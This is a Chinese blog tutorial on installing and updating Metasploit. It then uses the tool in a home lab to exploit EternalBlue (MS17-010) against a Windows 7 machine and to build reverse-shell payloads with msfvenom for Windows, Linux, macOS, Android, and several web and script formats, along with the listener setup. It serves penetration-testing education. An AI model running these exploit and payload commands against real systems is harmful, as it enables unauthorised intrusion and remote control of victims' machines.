内网安全系列-001-MSF安装与升级

发表于 分类于 Waline:
内网安全系列-MSF安装与升级

Metasploit

Metasploit基础

Metasploit Framework(MSF) 是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。

MSF的更新:msfupdate

Metasploit的安装和升级

在一般的linux中,默认是不安装MSF的。以下是在非kali的Linux下安装MSF框架。

安装步骤:

第一步:下载msfupdate.erb文件内容并写入msfinstall文件中

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall

image-20240901110555772

第二步:修改msfinstall文件权限并执行文件

1
chmod 755 msfinstall && ./msfinstall

image-20240901110907346

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@iZ7xvdva5kuivb9u4oyw13Z:~/msf# chmod 755 msfinstall 
root@iZ7xvdva5kuivb9u4oyw13Z:~/msf# ./msfinstall 
Adding metasploit-framework to your repository list..Updating package cache..OK
Checking for and installing update..
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  metasploit-framework
0 upgraded, 1 newly installed, 0 to remove and 7 not upgraded.
Need to get 365 MB of archives.
After this operation, 803 MB of additional disk space will be used.
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 6.4.25~20240831102604~1rapid7-1 [365 MB]
Fetched 365 MB in 55s (6,680 kB/s)                                                                                                                      
Selecting previously unselected package metasploit-framework.
(Reading database ... 127412 files and directories currently installed.)
Preparing to unpack .../metasploit-framework_6.4.25~20240831102604~1rapid7-1_amd64.deb ...
Unpacking metasploit-framework (6.4.25~20240831102604~1rapid7-1) ...
Setting up metasploit-framework (6.4.25~20240831102604~1rapid7-1) ...
update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode
Run msfconsole to get started

第三步:添加名为msf的用户

1
2
adduser msf #添加msf用户
su msf #切换到msf用户

image-20240901111316837

第四步:切换到msf所在目录并启动msf

1
2
cd /opt/metasploit-framework/bin #切换到msf所在的目录
./msfconsole #以后启动msfconsole,都切换到msf用户下启动,这样会同步数据库。如果使用root用户启动的话,不会同步数据库

image-20240901111707448

第五步:升级msf

1
msfupdate

image-20240901113337482

操作汇总:

1
2
3
4
5
6
7
8
9
10
11
12
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall && chmod 755 msfinstall && ./msfinstall
adduser msf #添加msf用户
su msf #切换到msf用户
cd /opt/metasploit-framework/bin #切换到msf所在的目录
./msfconsole #以后启动msfconsole,都切换到msf用户下启动,这样会同步数据库。如果使用root用户启动的话,不会同步数据库

也可以将msfconsole加入到执行目录下,这样在任何目录直接msfconsole就可以了
ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole
#备注:
#初次运行msf会创建数据库,但是msf默认使用的PostgreSQL数据库不能与root用户关联,这也这也就是需要新建用户msf来运行metasploit的原因所在。如果你一不小心手一抖,初次运行是在root用户下,请使用msfdb reinit 命令,然后使用非root用户初始化数据库。

MSF后期的升级:msfupdate

MSF使用方法

实验环境说明:

资产类型 IP地址 资产来源 资产角色
windows7 192.168.244.134 itellyou 被攻击机器
kali 192.168.244.130 kali 官方下载 攻击机器
msf6 安装在kali上 - 攻击工具

image-20240901183618789

使用步骤:

  • 进入框架:msfconsole
  • 使用search命令查找相关漏洞: search ms17-010
  • 使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
  • 使用info查看模块信息: info
  • 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
  • 查看模块需要配置的参数:show options
  • 设置参数:set RHOST 192.168.125.138
  • 攻击:exploit / run
  • 后渗透阶段

search ms17-010的输出结果:

image-20240901114035982

info命令输出结果:

image-20240901115136336

show options:

image-20240901183857437

run的运行结果:

image-20240901191749174

windows 7:

image-20240901183914381

不同的攻击用到的步骤也不一样,这不是一成不变的,需要灵活使用。

我们也可以将攻击代码写入 configure.rc(只要是以 .rc 结尾的文件)配置文件中,然后使用命令msfconsole -r configure.rc 进行自动攻击!

msfvenom生成shellcode

普通生成

1
2
msfvenom -p 有效载荷 -f 输出格式 -o 输出文件
msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

编码生成

1
2
3
4
msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e
编码方式 -i编码次数 -f 输出格式 -o 输出文件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
lhost=192.168.1.1 lport=8888 -i 3-e x86/shikata_ga_nai -f exe -o payload.exe

常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
(base) kali@kali:~$ msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message
(base) kali@kali:~$

msfvenom –list ,其中支持的type有:

支持的type 作用
payloads 列出所有可用的payload
encoders 列出所有的编码方式
nops 列出所有支持NOP指令的平台
platforms 查看支持系统平台
archs 查看支持的系统架构
encrypt 列出所有的加密方式
formats 列出所有的输出格式
all 查看所有 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
(base) kali@kali:~$ msfvenom --list nops

Framework NOPs (11 total)
=========================

    Name             Description
    ----             -----------
    aarch64/simple   Simple NOP generator
    armle/simple     Simple NOP generator
    cmd/generic      Generates harmless padding for command payloads.
    mipsbe/better    Better NOP generator
    php/generic      Generates harmless padding for PHP scripts
    ppc/simple       Simple NOP generator
    sparc/random     SPARC NOP generator
    tty/generic      Generates harmless padding for TTY input
    x64/simple       An x64 single/multi byte NOP instruction generator.
    x86/opty2        Opty2 multi-byte NOP generator
    x86/single_byte  Single-byte NOP generator

常见生成格式

windows

1
2
3
4
5
6
7
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

msfvenom --platform windows -a x64 -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=4445 -f exe -o payload.exe
等价于
msfvenom --platform windows -a x64 -p windows/meterpreter/reverse_tcp LHOST=192.168.244.130 LPORT=4445 -f exe -o payload.exe
1
2
3
msfvenom --platform windows -a x64 -p windows/meterpreter/reverse_tcp LHOST=192.168.244.130 LPORT=4445 -f exe -o payload.exe
这条命令会报错:Error: The selected arch is incompatible with the payload
当指定平台为windows时,无法使用-a x64参数。
案例理解

MSF设置监听状态:

1
2
3
4
use exploit/multi/handler
set LHOST 192.168.244.130
set LPORT 4445
run

image-20240901213946165

使用msfvenom生成payload:

1
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.244.130 LPORT=4445 -f exe -o payload.exe

image-20240901214500677

在payload.exe所在的文件位置执行如下命令:

1
python -m http.server 8080

image-20240901214415624

image-20240901214321069

双击执行payload.exe。

在kali上可以看到:
image-20240902211436112

Linux

1
msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

Mac

1
msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

Android

1
msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

ASPX

1
msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

JSP

1
msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

PHP

1
msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

Bash

1
msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

Python

1
msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py